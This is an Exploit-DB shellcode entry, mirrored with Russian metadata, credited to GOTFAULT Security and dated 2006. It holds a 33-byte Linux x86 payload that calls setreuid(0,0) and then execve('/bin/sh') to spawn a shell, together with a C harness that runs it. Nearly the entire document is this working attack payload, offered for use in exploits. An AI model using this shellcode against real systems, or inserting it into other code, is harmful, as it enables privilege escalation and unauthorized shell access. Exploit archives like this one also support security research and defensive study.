- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13379
- Проверка EDB
-
- Пройдено
- Автор
- GOTFAULT SECURITY
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2006-04-03
C:
/*
* (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])
* - 33 bytes
* - xgc@gotfault.net
*
*/
char shellcode[] =
"\x6a\x46" // push $0x46
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\x31\xc9" // xor %ecx, %ecx
"\xcd\x80" // int $0x80
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80
int main() {
int (*f)() = (int(*)())shellcode;
printf("Length: %u\n", strlen(shellcode));
f();
}
// milw0rm.com [2006-04-03]- Источник
- www.exploit-db.com
